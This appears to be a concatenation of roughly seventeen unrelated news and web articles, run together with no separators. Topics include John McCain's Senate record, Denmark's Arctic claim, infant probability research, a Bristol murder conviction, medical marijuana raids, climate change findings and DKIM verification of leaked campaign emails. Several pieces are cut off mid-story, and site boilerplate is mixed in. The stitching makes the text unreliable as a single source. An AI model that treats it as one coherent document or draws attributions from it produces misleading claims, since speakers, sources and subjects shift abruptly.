Close video Trump hits new low as war with press moves beyond just talk Rachel Maddow looks at the ways in which Donald Trump is trying to delegitimize, manipulate, and even eliminate the free press in the United States. share tweet email save Embed
“I hate the press. I hate you especially,” McCain joked. “But the fact is we need you. We need a free press. We must have it. It's vital.” He added, “If you want to preserve – I'm very serious now – if you want to preserve democracy as we know it, you have to have a free and many times adversarial press. And without it, I am afraid that we would lose so much of our individual liberties over time. That's how dictators get started.”The senator did not, for the record, call Donald Trump a dictator, but the implications of McCain's rhetoric of late aren't exactly subtle. The Arizona Republican delivered striking remarks on Friday that took aim at the Trump White House's foreign policy; he had some provocative things to say about the infamous Russian dossier; he chastised the administration's approach to national security as “dysfunctional”; and he's separated himself from a variety of key elements of the Trump agenda.The president himself has been annoyed enough with McCain to send a few snide tweets in his direction.This, naturally, has led to a resurgence of media affection for the longtime senator – with plenty of outlets dragging his “maverick” nickname out of storage. The New York Times today labeled McCain Trump's “ Critic in Chief .”Before the gushing gets completely out of hand, it's worth pausing to appreciate the disconnect between McCain's rhetoric and his actions.Sure, the GOP senator has been willing to criticize Trump – at times, in surprisingly forceful terms – which is more than can be said for many of his congressional Republican colleagues, nearly all of whom remain silent, despite genuine concerns. But McCain doesn't just give speeches and sit down for interviews; he's also a sitting senator who casts votes.And in the Senate, so far this year, McCain is voting with Trump's position 94% of the time . As a factual matter, the senator is a Maverick in Name Only.I'm more than happy to give McCain credit for standing up in support of American principles, rhetorically defying a president of his own party, but his posture is clearly incomplete. McCain's boldness ends when the voting in the Senate begins.Those eager to defend the senator will say electoral pressures create conditions in which McCain effectively has no choice but to toe the party line. The truth, however, is that he just won re-election; he's 80; and there's no reason to assume he's running for re-election in November 2022.For that matter, 16 years ago, McCain was an actual maverick – voting against key Republican priorities, including the Bush/Cheney tax cuts – so it's not as if we're lacking a credible point of comparison.And yet, much of the political world seems inclined to credit McCain for resisting Trump's more outlandish excesses, even though McCain isn't following through when it counts. Worse, there are Democrats trying to get attention for the fact that they're actually resisting Trump both rhetorically and legislatively. It creates a dynamic in which voters are led to believe McCain's verbal rebukes matter far more than more substantive Democratic opposition, which paints an outrageously misleading picture.Maybe this will change in the coming months. Perhaps McCain will soon start breaking with his party, leveraging the power that senators in the majority have in a 52-48 chamber, and forcing real changes. Maybe McCain's concerns will become more substantive and meaningful. There's a fair amount of power in the senator's hands, and it's possible he'll start using it in constructive ways.But in 2013, I wrote , “Every few years, we're greeted with a fresh round of ‘Maybe the Maverick is back!' headlines. As you may have noticed, they don't last.”This time could be different, but given McCain's recent voting record, I wouldn't count on it.
For years, the Race for the Arctic had promised to be one of the most gentlemanly land grabs in history: Using only science and a whiff of diplomacy, the oil-rich Arctic Ocean could be peacefully divvied up between Russia, Canada, the United States and Europe.
That is, until the tiny nation of Denmark approached the United Nations on Monday with a staggering claim to nearly one third of the total prize — including the North Pole.
“It is ironic that the only country that right now could be said to be acting provocatively in the Arctic is Denmark,” said Michael Byers, the Vancouver-based author of Who Owns the Arctic? speaking to Danish media on Monday.
Canada has not yet wrapped up its final claim to areas of the Arctic Ocean now considered international waters, although it is rumoured that Ottawa's submission will include 1.7 million square kilometres of ocean, including the North Pole. There is no definitive scientific evidence that Canada has any claim to the North Pole, but that did not stop Citizenship and Immigration Minister Chris Alexander from issuing Santa Claus with Canadian citizenship last year.
On Monday, Rob Huebert at the University of Calgary's Centre for Military and Strategic Studies called Denmark's claim evidence that it was wrong to ever believe that the Arctic could be divvied up simply with geological data.
“I think we got sold a bill of goods,” he said. “I don't think the Russians or the Danes, once it came up to the political leadership, ever really intended to do that.”
In its official filing to the UN's Commission on the Limits and the Continental Shelf
the Kingdom of Denmark officially laid claim to an 895,000 square kilometer chunks of the Arctic Ocean.
Bolstered by $64-million in Arctic scientific research (some of which was carried out jointly with Canada), the Danish claim hinges on the assertion that that the Lomonosov Ridge, a massive underwater mountain range, is an extension of Greenland.
Not only does the Danish claim push right to edge of Russia's existing Arctic boundaries, but it includes thousands of hectares of resource-rich seafloor previously claimed by Moscow.
Recent estimates put Arctic undersea oil reserves at 13 per cent of the global total of undiscovered oil, and natural gas at 30 per cent of the total.
“It doesn't exercise self-restraint … a lot of people are surprised they went for the whole enchilada,” said Mr. Byers, speaking from a hotel room in Novosibirsk, Russia, where he is appearing for a book launch.
‘It is ironic that the only country that right now could be said to be acting provocatively in the Arctic is Denmark'
While Denmark's science is technically correct, Mr. Byers said he expects that Moscow will react by filing an equally massive claim.
“Everyone's going for everything they can at this stage,” he said, adding that Denmark's no-holds-barred claim is merely posturing for future negotiations with the four other Arctic powers: Canada, Russia, Norway and the United States.
When that occurs in about 15-20 years, said Mr. Byers, Canada will likely end up with as much as half of the Danish claim.
“This process will take a lot of time and patience, one of my colleagues called it a ‘ping pong game,'” said Joël Plouffe, a fellow at the Canadian Defence & Foreign Affairs Institute.
With the Danish general election only a few months away, the gargantuan claim has garnered wide political support in Denmark.
On Monday, Foreign Minister Martin Lidegaard called it a “historic and important milestone,” and boasted in an interview that expanding their kingdom to the North Pole would boost the country's “voice in the world.”
Following Russian-sponsored incursions into Ukraine, Denmark has seen a dramatic increase in Russian military patrols over the Baltic Sea in recent months, leading to a near-collision last week between a Russian jet and a Copenhagen airliner.
Johannes Nordby, an analyst with the Royal Danish Defence College, said he expects Russia's saber-rattling to increase even further in a drive to “put pressure on Denmark” over the Arctic issue.
“I think you're going to see some kind of overt military movements [from Russia] … I would not be surprised by that,” he said.
Nevertheless, Seva Gunitsky, a Russian-born political scientist at the University of Toronto, said the government of Vladimir Putin is likely going to follow the rules in its Arctic policy dealings — at least for the anticipated future.
“Russia has little to gain materially from pursuing its Arctic claims too aggressively at this point, unless the Putin government thinks they can use the conflict to bolster domestic support,” he wrote in an email to the National Post.
CORRECTION: An initial draft of this story claimed that Ottawa had “vowed” to file a 1.2 million square kilometre claim in the Arctic. The 1.2 million figure actually refers to a separate Atlantic Ocean seabed claim.
National Post, with files from the Canadian Press
• Email: thopper@nationalpost.com | Twitter: TristinHopper
Summary: Researchers discover children as young as 6 months old can have a sense of probability.
Source: Max Planck Institute.
One of the most important features of the human mind is its ability to make generalisations based on sparse data. Our brain accomplishes this task by using probability information to represent statistical regularities in our environment and guiding our actions. As adults, we have a vague understanding of which events are likely to happen. But so far, it has not been clear when in our lifespan we begin to estimate which events are more likely to occur than others. Scientists at the Max Planck Institute for Human Cognitive and Brain Sciences (MPI CBS) in Leipzig have now shown that even six-month-old babies have a sense of probability.
Our whole life we have to make decisions and weigh up probabilities of different events. By learning to estimate which event is more likely to happen, we become better at analysing risks and benefits to guide our actions. But when do we start to gain a sense of stochasticity? Are babies even able to determine likelihood?
Scientists at the Max Planck Institute for Human Cognitive and Brain Sciences (MPI CBS) in Leipzig and the University of Uppsala, Sweden, have now discovered that even six-month-old babies can estimate probabilities. The babies already succeed in determining which colour makes up the majority of the balls and therefore which one is more likely to be drawn. “Six months seems to be the minimum age at which infants start to deal with probability information. One previous study showed that babies at just four months old were not able to perform this task and therefore seemed to not yet be sensitive to this information”, says Ezgi Kayhan, neuroscientist at MPI CBS and leader of the underlying study. “We suppose that from early on in life, our brains represent statistics of the environment. Within the first six months of life, babies are able to extract information about which events follow on from each other, or how likely one event is compared to another.”
The neuroscientists investigated these relations by presenting animated film clips to 75 babies aged six, twelve and 18 months. These short movies featured a machine filled with balls, most were blue, some yellow, which in a second sequence ejected lots of the mainly available blue balls into one basket, and into another container mainly yellow balls. In this context it was 625 times less likely that the machine chose yellow balls instead of blue. Therefore, the basket being filled with mainly yellow balls was a very unlikely event.
The babies preferred to look at the basket mainly filled with yellow balls (left red square) in comparison to the other one (right red square)—presumably because they were surprised that it was just made up of the rare yellow balls and that it was therefore a very improbable event. NeuroscienceNews.com image is credited to MPI CBS.
While the babies watched the movies the scientists observed them using the so-called eyetracking method to see which of the two baskets they looked at for longer – the likely or the unlikely option. “We noticed that the infants stared longer at the unlikely option independently from the tested age group to which they belonged—presumably because they were surprised that it was just made up of the rare yellow balls and that it was therefore a very improbable event“, explains the Turkish-born scientist. To make sure that the babies were not just more attracted by the colour yellow in some of the trials, the researchers also used green and red balls.
“In fact, several studies have already investigated whether infants can assess probabilities, but we've been the first to research whether the difficulty level of the likelihood information makes a difference”, Kayhan states. Accordingly, Kayhan and her team wanted to test the limits of these estimations: Are babies still sensitive to this information when the likely and unlikely sample are difficult to distinguish?
Indeed, the babies' looking preferences changed depending on the ratio of blue and yellow balls. When it was only nine times more likely that the machine would pick the blue ball instead of a yellow one, the babies preferred to look at the likely blue-dominated sample for longer. “This outcome was especially surprising. One explanation could be that with decreasing ratio between the two colours, the complexity of the information increased and therefore infants preferred to focus their attention on the subset that looked more familiar. From previous studies it is known that babies prefer to look at familiar objects if they still need to encode information. In the difficult case, the information was more complex, thus the processing load was heavier within this time period”, Kayhan adds. Regardless of a possible explanation the study made clear that the infants' ability to estimate probabilities strongly depends on how difficult it is to differentiate between the likely and the unlikely sample.
About this neuroscience research article
Source: Max Planck Institute
Publisher: Organized by NeuroscienceNews.com.
Image Source: NeuroscienceNews.com images are credited to MPI CBS.
Original Research: Abstract for “Infants Distinguish Between Two Events Based on Their Relative Likelihood” by Ezgi Kayhan, Gustaf Gredebäck, and Marcus Lindskog in Child Development. Published online October 3 2017 doi:10.1111/cdev.12970
Cite This NeuroscienceNews.com Article
MLA
APA
Chicago Max Planck Institute “Probability Calculations – Even Babies Can Master Them.” NeuroscienceNews. NeuroscienceNews, 3 November 2017.
<http://neurosciencenews.com/probability-calculations-babies-7868/>. Max Planck Institute (2017, November 3). Probability Calculations – Even Babies Can Master Them. NeuroscienceNews. Retrieved November 3, 2017 from http://neurosciencenews.com/probability-calculations-babies-7868/ Max Planck Institute “Probability Calculations – Even Babies Can Master Them.” http://neurosciencenews.com/probability-calculations-babies-7868/ (accessed November 3, 2017).
Abstract
Infants Distinguish Between Two Events Based on Their Relative Likelihood
Likelihood estimations are crucial for dealing with the uncertainty of life. Here, infants' sensitivity to the difference in likelihood between two events was investigated. Infants aged 6, 12, and 18 months (N = 75) were shown animated movies of a machine simultaneously drawing likely and unlikely samples from a box filled with different colored balls. In different trials, the difference in likelihood between the two samples was manipulated. The infants' looking patterns varied as a function of the magnitude of the difference in likelihood and were modulated by the number of items in the samples. Looking patterns showed qualitative similarities across age groups. This study demonstrates that infants' looking responses are sensitive to the magnitude of the difference in likelihood between two events.
“Infants Distinguish Between Two Events Based on Their Relative Likelihood” by Ezgi Kayhan, Gustaf Gredebäck, and Marcus Lindskog in Child Development. Published online October 3 2017 doi:10.1111/cdev.12970
Feel free to share this Neuroscience News.
The video will start in 8 Cancels
Get the biggest daily stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
A paranoid schizophrenic who stabbed a refugee and cut off his penis hours after being released from hospital against the advice of psychiatrists has been convicted of murder.
Jeffrey Barry, 56, attacked his neighbour Kamil Ahmad, 49, at his flat on Wells Road in Bristol at about 2am on July 6 last year.
Barry held a long-standing grudge against Iraqi-born Kurd Mr Ahmad and had called police weeks before, claiming he was a rapist, a paedophile and a terrorist in Iraq, Bristol Crown Court heard.
He murdered Mr Ahmad in a "savage and sustained" knife attack hours after being released from a psychiatric hospital near seaside town Weston-super-Mare.
The court heard that psychiatrists had opposed Barry's release, but a mental health tribunal ruled that he should be discharged.
Barry, who is being held in Broadmoor Hospital, denied murdering Mr Ahmad and instead admitted manslaughter by diminished responsibility.
But a jury unanimously convicted him of murder after two hours of deliberations at the end of the two-week trial.
Barry, who has paranoid schizophrenia, was racist towards Mr Ahmed and had previously assaulted him, the court heard.
In a phone call to police weeks before the killing, Barry claimed Mr Ahmed was a rapist, a paedophile and a terrorist in Iraq.
A post-mortem examination found Mr Ahmed had been repeatedly stabbed, including 25 times to his face and eyes, during Barry's attack and his penis cut off after death.
Barry, of Wells Road, Bristol, denied murder but admitted manslaughter by diminished responsibility.
Barry had been discharged from the Cygnet Hospital Kewstoke less than 12 hours before he killed Mr Ahmed.
He was sectioned and brought to psychiatric intensive care unit Hazel Ward at Callington Road in Bristol on June 13.
Video Loading Video Unavailable Click to play Tap to play The video will start in 8 Cancel Play now
A week later, he was transferred to the open ward Cygnet Hospital after telling staff his behaviour was due to excessive cannabis and alcohol.
His case was reviewed by a mental health tribunal, who released him with medication after he promised not to drink or take drugs.
Students gather behind a business looking for a Internet signal for their smart phones in Havana, Cuba, Tuesday, April 1, 2014. (AP Photo/Ramon Espinosa)
Published every weekday, the Switchboard highlights five tech policy stories you need to read.
U.S. secretly created 'Cuban Twitter' to stir unrest. "When the network reached a critical mass of subscribers, perhaps hundreds of thousands, operators would introduce political content aimed at inspiring Cubans to organize 'smart mobs,'" according to the Associated Press, "mass gatherings called at a moment's notice that might trigger a Cuban Spring, or, as one USAID document put it, 'renegotiate the balance of power between the state and society.'"
Yahoo now encrypting traffic from its data centers, and plans to encrypt Messenger too. "In a meeting with reporters today, [Yahoo chief information security officer Alex] Stamos — who joined Yahoo three weeks ago — did not specifically call out the National Security Agency by name, but made it clear that revelations about NSA spying led directly to Yahoo's move toward more encryption," according to the Verge.
Computer companies back Aereo. "The Computer & Communications Industry Association (Google, Microsoft, Yahoo!) and Mozilla tell the Supreme Court that if it finds against Aereo, it would threaten cloud computing," according to Multichannel News.
EU Parliament votes to end roaming fees by 2016, protect 'net neutrality.' "The European Parliament voted overwhelmingly in favor of ending mobile phone roaming fees on Thursday," Reuters reports, "a move that will cheer Europe's consumers even as it frustrates telecoms companies."
Government plans to adopt ODF file format sparks standards debate in UK. "The U.K. is moving to a system where citizens can exchange information with the government digitally by default," writes Computerworld, "but in choosing the file formats to use for that exchange, it must balance corporate interests with those of citizens."
While the Kurdish YPG continues to tout the progress they are making against ISIS, the jihadists have managed to get around to carrying out a retaliatory strike of their own, hitting YPG targets east of the city of Raqqa, sparking a long gunbattle and causing a number of casualties.
The exact death toll is a matter of considerable dispute. ISIS claimed 53 YPG were killed, and the Syrian Observatory said a number were killed and injured, but weren't specific. The YPG insists the ISIS statement was false, but didn't offer alternative numbers.
The target was a pair of armored personnel carriers and the troops along with them. They were traveling through territory presently held by the YPG, but which was ISIS territory only months ago, taken in the course of the advance on Raqqa.
This is a common strategy for ISIS when they face pressure, carrying out a counter-offensive to try to put the invading force off-balance. Reports of substantial casualties, and even unconfirmed reports ISIS captured some Kurds in this action are likely to succeed in reducing YPG morale.
Last 5 posts by Jason Ditz
It seems David Accam has had eyes on making a move to Europe even upon arriving to the Fire in December of 2014.
Back then coach Frank Yallop knew of Accam's aspirations to play at the highest levels and admitted part of his pitch for getting him to come here revolved around a successful run with the Fire enabling him to draw attention for bigger money by bigger leagues. Rumors about interest from teams in France, Holland and others have persisted since his first summer with the Fire as his agent has continued to explore every possibility and continued to angle for a more lucrative extension if the Fire were going to keep him past 2017.
Accam will be 27 in September and he knows his opportunity for maximizing his value is now. Another year or two in MLS will close his window for cashing in on a Euro chance, but the prospect of staying in the U.S. was more palatable if his compensation was increased above what his original terms dictated.
The Fire...
Can't get enough of the epic conclusion to Christopher Nolan's Batman trilogy? Then download THE DARK KNIGHT RISES: PROLOGUE app from DC Comics, sponsored by Nokia and available on Nokia Windows Phone devices. The app features an exclusive motion-comic from writer Joshua Williamson and artist Jorge Jimenez that serves as a prologue to THE DARK KNIGHT RISES film. The app also include social media share options and links to other apps tied to the film.
And if you still can't get enough of THE DARK KNIGHT RISES, check out the BATMAN: ORIGINS app, also sponsored by Nokia. The app features the original comic origins for all of the stars from the Dark Knight trilogy and links to the most up-to-date sources about THE DARK KNIGHT RISES film. Download these hot apps from your Nokia Windows Phone to celebrate the acclaimed conclusion to the caped crusader's last adventure in the Dark Knight trilogy.
A scene from the new "The Dark Knight Rises: Prologue" app from Nokia.
Rumor: Microsoft “Going in Hard” in 2015 Holiday Season; Quantum Break on Xbox One Targeting September
Giuseppe Nelva October 14, 2014 4:50:45 PM EST
2015 will be the second full year of life of the new generation of consoles, and according to industry insider shinobi602, who is normally well informed and reliable in what his sources share with him, mentioned that Microsoft has big plans for the holiday season.
Hmm, Microsoft's going in hard next holiday season. Known things and some unknown things…
Shinobi also elaborated further, mentioning that he's talking about more than Halo 5: Guardians and Tomb Raider and we're looking mostly at titles developed in-house. His sources did not bring up Crackdown as a 2015 game, but he explained that Quantum Break is targeting a September release date.
After a while, he also mentioned that Sony has some hard hitters in the pipeline as well, and there are “All kinds of good things for XB1 and PS4 owners” coming.
Of course, as it's usual with this kind of information coming from insiders, it should be taken with a grain of salt despite Shinobi's usual reliability (for instance he described Guerrilla Games' new RPG's leaked key artwork to a T months before it actually surfaced).
One thing is for sure: the battle for console supremacy next year is going to be even more heated than the one we're seeing in 2014.
Amid the dying light of the last Parliament one of the final pieces of legislation to hit the statute book was the aid bill, enshrining in law Britain's commitment to spend 0.7 per cent of GNI on international development. Included in all three party manifestos in 2010, it featured in the Coalition Agreement and finally got over the line thanks to a Private Member's Bill from Michael Moore.
Although UK aid is criticised by those who often claim to be most patriotic about Britain, it seems to me our generosity to the world's poorest people is something to be proud of rather than bitter about. Especially when you consider how the Department for International Development is leveraging this money to encourage free and fair markets and igniting an emerging global private sector. In the same way the old left versus right ideological battle lines have moved on, so has the binary perspective of the state versus the market. UK aid is an example of the two working together.
Sustainable economic growth in the poorest countries will be one of the quickest ways of alleviating poverty but leaving it to the free market alone hasn't helped those that need it the most. The world's Least Developed Countries receive only 1.9 per cent of foreign direct investment. There are investment opportunities in these countries; they just need an injection of targeted capital to kindle them into flame.
Too often businesses are put off from investing in frontier economies because of the risk. In a speech at the London Stock Exchange last year Secretary of State Justine Greening explained how DfID was working to remove these investment obstacles. She said: “Poor infrastructure, poor regulation, information gaps and financial challenges tip the balance away from investment.”
In Nigeria, DfID's technical assistance programmes have helped increase the country's power supply by 45 per cent. In Bangladesh it has helped to cut the number of days it takes to register a business down from 57 to just three. And in East Africa UK aid is improving roads on crucial trade corridors, cutting time wasted in customs and modernising the largest port in Mombasa.
Creating competition is healthy to any market economy and the poor lose out to cartels more than anyone. Small businesses account for more than 45 per cent of all employment in developing countries and their growth is vital to creating jobs and increasing prosperity. But one of the primary stumbling blocks is raising finance. By working through local banks and NGOs British aid is able to help fill this finance gap and help the growth of the private sector.
Clearly nothing is perfect and the case for aid has been damaged by the examples of corruption which are trumpeted with glee in parts of the media. But in the same way when one company boss is found guilty of malpractice or corruption we don't nationalise their entire industry, so international aid can't be defined by single examples where things go wrong. The issue of improving local governance is a strategic priority for DfID. It is also a reason to channel funds through British NGOs which often deliver aid directly to those in need and operate under DfID's rigorous accounting and auditing conditions.
International development is a complex process requiring nuanced approaches to be effective. In the same way old notions of the state versus the market are out of date, so is the simplistic definition of a ‘poor country'. Today 75 per cent of the world's poorest people live in middle income countries like India – hence the headlines about aid going to nations with space programs. But if we want to reach the world's poor and create a more prosperous planet then working with middle income countries is essential.
A lack of money and possessions is not the cause of poverty, it is a symptom of it. That's why getting to the root of the problem and tackling structural causes is so important. DfID's focus on job creation and economic growth is one example of this. Others include increasing the economic choices of women and addressing climate change (effectively international development in reverse).
DfID not only encourages a growing global private sector it also recruits UK firms to help deliver development. It has teamed up with Sainsbury's to help workers gain qualifications and access better jobs in South Africa, worked with Marks & Spencer to develop leadership skills of farmworkers in Kenya and collaborated with Debenhams and Asda to improve the management of garment factories in Bangladesh.
It's worth noting that emerging markets in 2015, where British businesses trade and make money, were minnows 20 years ago. Investing in today's poorer countries will create tomorrow's trading partners. But overseas aid shouldn't just be spent to make ourselves richer. Ultimately it is a good thing for the world's fifth largest economy to invest 0.7 per cent of its income to help the world's poorest people.
Aid delivery in the 21st century is getting better and smarter all the time. Fuelling enterprise, opening up markets and tackling the structural causes of poverty have the potential to change the world.
Joe Ware is Church & Campaigns Journalist at Christian Aid.
Share
Leslie Rutledge, Republican nominee in the race for Arkansas attorney General, speaks at the Republican Party of Arkansas state convention in Hot Springs, Ark., Saturday, July 19, 2014. (AP Photo/Danny Johnston)
The Republican candidate for Arkansas attorney general is no longer a registered Arkansas voter.
Pulaski County Clerk Larry Crane on Tuesday canceled the voter registration for Leslie Rutledge of Little Rock after confirming that the former Gov. Huckabee legal aide is registered to vote in Washington, D.C., and possibly Virginia.
After the matter was drawn to his attention late last week, Crane confirmed that Rutledge had registered in multiple locations after registering in Pulaski County in 2006 and canceled her registration.
Rutledge registered to vote in Washington in July 2008 but voted absentee in Arkansas in the 2008 general election.
Read Wednesday's Arkansas Democrat-Gazette for more on this story.
One of Obama's campaign promises was to stop federal raids on medical marijuana dispensaries which were allowed by state law. Many pundits (myself included) have been lambasting him for not living up to that promise based upon stories like these:
Police raids on medical marijuana dispensaries continue–and continue with federal help, despite an Obama promise to end federal raids on state-legal medical pot dealers. Of course, Obama gave his Justice Department a loophole, with Attorney General Eric Holder saying back in March that his DEA's resources would “go after those people who violate both federal and state law….Given the limited resources that we have, our focus will be on people, organizations that are growing, cultivating substantial amounts of marijuana and doing so in a way that's inconsistent with federal and state law.” This was a way to live up to Obama's promise that federal raids on people who were not violating their own state's law regarding medical marijuana would cease. Unfortunately, so far it's hard to know how serious to take this promise in relation to these latest L.A. raids, since the federal agents' role in the raids on two Westside pot dispensaries (and their owners' private homes) is still unexplained as of this writing. As the San Jose Mercury News reports. Authorities are not saying why they raided two medical marijuana clinics and arrested the operator at his Los Angeles home. Jeffrey Joseph was free on bail Thursday, one day after local and federal agents searched his home and the dispensaries in Los Angeles and Culver City. Agents seized 450 plants and hundreds of pounds of marijuana products. Spokespeople for the Drug Enforcement Administration, Los Angeles police, and the U.S. attorney say they don't know what Joseph was book on. County prosecutors released no details. Distributing medical pot is legal under California law but it's a federal crime. However, the U.S. attorney general has said he wouldn't target distributors unless state and federal laws were broken. County prosecutors say the task force was acting on a state warrant.
There's a little history here. Medical Marijuana dispensaries have become much more common in Los Angeles over the last few years due to several loopholes and exemptions that made it possible for them to open quickly. The city council has been trying recently to cut down on these loopholes in order to reduce the number of operating dispensaries, but their own legal exemptions are making it very hard to do this quickly.
So how to close these shops without having to go through arduous examinations of dispensaries' “hardship exemption” applications? Simple, prove they've been doing something else to break the guidelines. On the bright side, they can then call in the big guns at the DEA to lend a hand! It's win-win for the City Council and the Feds (and a big LOSE for the dispensary owners and their customers, of course).
Sadly, many of the dispensaries are making the job easy on the city. A personal acquaintance of mine is a CPA and runs the books for several of these dispensaries, and this is his take on the matter:
The more I interact within this industry the more I realize how illegal most of these operations are. The state attorney general set up specific guidelines, as did the state board of equalization, that would allow an owner to operate freely without fear of raids & prosecution. The key issue in these operations is transparency, which most dispensaries fail to realize. Those operations that have their doors and books open to state and city regulators are never harassed. The clubs that operate outside of the guidelines are always targeted. And from a accounting and tax standpoint, it's extremely simple to figure out who is operating by the book and who's not. I tell all my new clients to always be aware of the fact that the board of equalization is keeping a close eye on the industry to ensure that every sale is taxed and that every penny is sent to the state. The state BOE is in bed with the Feds and have no problem calling for the leg-breakers (the IRS) when they feel they're being ripped off; which in most cases they are.
These raids are a violent and disruptive elucidation of one critical aspect of business in our government-dominated world — your business exists at the pleasure of the state. If they want to find a reason to come after you, they will find a reason to come after you, or manufacture one. There are a lot of regulations attached to any business, and even more to the medical marijuana industry. If they're watching, they'll catch you breaking one of them:
The only power any government has is the power to crack down on criminals. Well, when there aren't enough criminals, one makes them. One declares so many things to be a crime that it becomes impossible for men to live without breaking laws.
-Ayn Rand
This is the modern equivalent to catching Al Capone on tax evasion, when there wasn't enough to bust him on the charges of bootlegging (and everything else he was involved in). Obama's not technically breaking his promise here, but he's still offering to bring in the big guns and prosecute pot dispensaries if they violate tax laws. He's violating the spirit of the promise.
Please enable Javascript to watch this video
DES MOINES, Iowa - Developers say they're taking advantage of a growing trend in bicycling in downtown Des Moines by building a 154-unit apartment complex designed for bike-lovers.
Nelson Construction and Development says "Bici Flats" won't just be for bike lovers - they hope to see anyone move in - but some of the amenities they offer will thrill the cyclists in Des Moines. Across the street from the trail-side bar, Mullets, and at the intersection of three popular bike trails, organizers hope Bici Flats will start a domino-effect of development for the Two Rivers district of downtown Des Moines - an area city leaders have long-desired to see more commercial and residential activity. The $1.75 million project will feature bike storage areas, repair stands, and a bike wash-room in each building. Developers say each balcony is designed for the most-optimal view of the downtown skyline, as well.
"When you look at downtown, if you're not going to be right in the core, you start to look at what's just on the periphery and on the edge. And I think this is the most exciting neighborhood close to downtown Des Moines," said Alexander Grgurich, a development partner. "You've got a really dynamic park down the street, you've got an Italian grocery store, you've got the best Italian food...you've got all these amenities - great views, natural rivers, scenic."
The project is expected to break ground this May, and developers hope to see it open for tenants as early as spring of 2016.
Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Send me an email! Want to get involved? We love contributions.
This Week in Rust is openly developed on GitHub. If you find any errors or omissions in this week's issue, please submit a PR.
What's cooking on master?
99 pull requests were merged in the last week, and 3 RFC PRs.
Now you can follow breaking changes as they happen!
Breaking Changes
Other Changes
New Contributors
John Zhang
Ricardo Martins
Trent Nadeau
Approved RFCs
New RFCs
Upcoming Events
If you are running a Rust event please add it to the calendar to get it mentioned here. Email Erick Tryzelaar or Brian Anderson for access.
Quote of the Week
text < reem> I'm quite interested in discovering this HTTP/2 library, but I can't bring myself to read four paragraphs of small caps
In reference to last week's celebration of Terry Pratchett on /r/rust.
Thanks to bstrie for the tip. Submit your quotes for next week!.
The Arctic is melting with no turning back. Climate change increased rainfall during Hurricane Harvey by at least 15%. And several extreme weather events that occurred in 2016 would not have been possible without man-made global warming.
These are among the findings being discussed this week at this fall's meeting of the American Geophysical Union in New Orleans, the largest gathering of Earth scientists in the world. Taken together, the findings show the deepening urgency of the fight against climate change.
“Climate change is hurting us without a doubt,” said James Byrne, a professor at the University of Lethbridge who studies climate change, at a press conference. “Houston, India, Bangladesh, Nepal, British Columbia — worst fire season ever. California, I think they declared it the worst fire season.”
Scientists have explored the link between climate change and extreme weather events for years, but many of the conclusions have relied on forecasts of potential future damage. This year, scientists say, the findings are no longer theoretical. Man-made global warming is causing problems here and now.
The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now
Take the American Meteorological Society's report on extreme weather events in 2016, the sixth annual iteration of the report. In the past, the group found that likelihood had increased the chances of certain extreme weather events. But this year scientists found that 2016's record global temperatures and historic warm waters in the Bering Sea “would not have been possible” in a world without human-caused climate change.
“These events were not just influenced by human-caused climate change,” said Jeff Rosenfeld of the American Meteorological Society at a press conference. “Some of the events in 2016 could not have happened without climate change.”
The report also highlighted global heat waves, an extreme occurence of El Niño and bleaching of coral reefs. These extreme events are all closely tied to climate change, though they remain theoretically possible in a world without the phenomenon.
Another report from the National Oceanic and Atmospheric Administration found that the state of continued ice melt, loss of snow cover and warm temperatures will be the “new normal” in the Arctic. The signs of climate change in the region have been pronounced for years as air temperatures have risen there at twice the rate as they have globally.
The effects of a melting Arctic — and the strong likelihood that it will not return to a normal state anytime soon — has significant implications far beyond its boundaries. Arctic sea ice plays an important role moderating global temperatures as it reflects sunlight back into space. And scientists say that the swift warming in the Arctic is a concerning sign of what's to come globally. “Unlike Vegas what happens in the Arctic doesn't stay in the Arctic,” said Tim Gallaudet, acting NOAA administrator, at a press conference. “It affects the rest of the planet.”
Two separate studies presented at the conference showed that climate change worsened rainfall when Hurricane Harvey struck Houston earlier by somewhere between 15% and 38%. That storm brought nearly 50 inches of rain to some areas and caused billions in damages. The research comes as scientists increasingly try to draw explicit conclusions about the effect of climate change and individual storms, a practice unthinkable just a decade ago.
The warning from scientists comes as policymakers across the globe continue to grapple how to stem temperature rise. Countries have committed to trying to keep temperatures from rising more than 2 degrees Celsius (or 3.6 degrees Fahrenheit) by 2100, but recent research shows leaders remain far from meeting that goal.
Write to Justin Worland at justin.worland@time.com.
After Democratic Party boss Donna Brazile claimed emails showing her apparently tipping off Hillary Clinton to questions at a March town hall were “doctored,” tech sleuths got to work -- and now say they've found proof the emails are authentic.
Fox News' Megyn Kelly questioned Brazile last week about an email that surfaced in hacked messages from Campaign Chairman John Podesta's account. The email, posted by WikiLeaks and attributed to Brazile, passed on a question to campaign adviser Jennifer Palmieri about the death penalty, under the subject line: “From time to time I get questions in advance.”
The exchange came right before a March town hall hosted by CNN and TV One, where a similar question was asked. Yet Brazile denied receiving questions from CNN.
"I have seen so many doctored emails. I have seen things that come from me at 2 in the morning that I don't even send,” she said, adding, "I will not sit here and be persecuted, because your information is totally false.”
However, tech blog Errata Security quickly found the email in question could be verified using an everyday verification program.
DomainKeys Identified Mail (DKIM) is a system employed by many email servers, including HillaryClinton.com, to verify emails to recipients and avoid spam filters. The system sends a DKIM "key" to the receiver to verify the sender and confirm the email hasn't been tampered with.
Consequently, bloggers ran the DKIM keys included in this and other emails through verification software, which in turn validated the Palmieri email as both real and undoctored. The Daily Caller also ran a similar test and got the same result.
In a blog post for Errata Security, cybersecurity expert Robert Graham presented his results, and showed that if the emails had been altered in any way, the software would have declared the email unverified.
"It took less than five minutes," Graham told FoxNews.com, noting that such software is common and widely available. "It took me longer to document what I had found."
But could WikiLeaks have hacked and altered the DKIM key also?
Graham says this is unlikely, since to do so they would have needed to access the HillaryClinton.com server.
Graham is so confident in his finding that he has posted a $600 BitCoin challenge to anyone who can alter an email and have it still come up as verified when run through DKIM software.
“If somebody tells you this blogpost is invalid, then tell them they can earn about $600 (current value of BTC) proving it. Otherwise, no,” he says.
Clinton running mate Tim Kaine has also suggested the WikiLeaks emails could be doctored, but so far neither the campaign nor the DNC has presented evidence to support this claim.
FoxNews.com's Adam Shaw contributed to this report.
A Labour peer who blamed his imprisonment on a "Jewish conspiracy" was suspended by the party Thursday morning, The Times reported.
